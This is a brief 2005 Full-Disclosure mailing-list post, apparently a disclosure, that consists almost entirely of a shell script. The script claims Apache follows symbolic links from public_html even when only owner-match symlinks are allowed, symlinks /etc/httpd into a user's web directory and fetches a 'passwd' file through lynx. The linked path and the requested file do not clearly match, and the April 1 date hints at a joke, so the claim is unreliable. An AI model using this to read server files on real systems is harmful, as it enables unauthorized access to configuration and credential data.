[Full-disclosure] Phun With Apache

duper at willhackforfood.biz duper at willhackforfood.biz
Fri Apr 1 10:19:55 BST 2005


#!/bin/sh
## Apache follows symbolic links referenced by public_html!
## Even when SymLinksifOwnerMatch is set and FollowSymLinks is not!
## A super-easy way to gain read access on files owned by the apache user!
ln -s /etc/httpd ~/public_html
lynx http://localhost/~duper/passwd




Full-Disclosure is hosted and sponsored by Secunia.